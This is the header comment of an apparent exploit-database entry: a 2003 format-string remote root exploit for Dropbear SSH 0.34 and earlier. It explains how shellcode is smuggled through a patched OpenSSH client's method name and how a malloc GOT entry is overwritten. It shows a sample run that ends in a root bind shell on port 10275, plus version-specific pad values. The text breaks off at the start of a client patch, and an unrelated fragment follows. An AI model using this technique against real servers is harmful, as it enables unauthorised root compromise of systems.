
Linux x86 Dropbear SSH <= 0.34 remote root exploit

* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
* % telnet localhost 22
* Trying
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by
* % telnet localhost 10275
* Trying
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
* gr33tz: ppro, alcaloide and friends.
* 21.08.2003
* Please do not distribute
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000


linux tasklet 4

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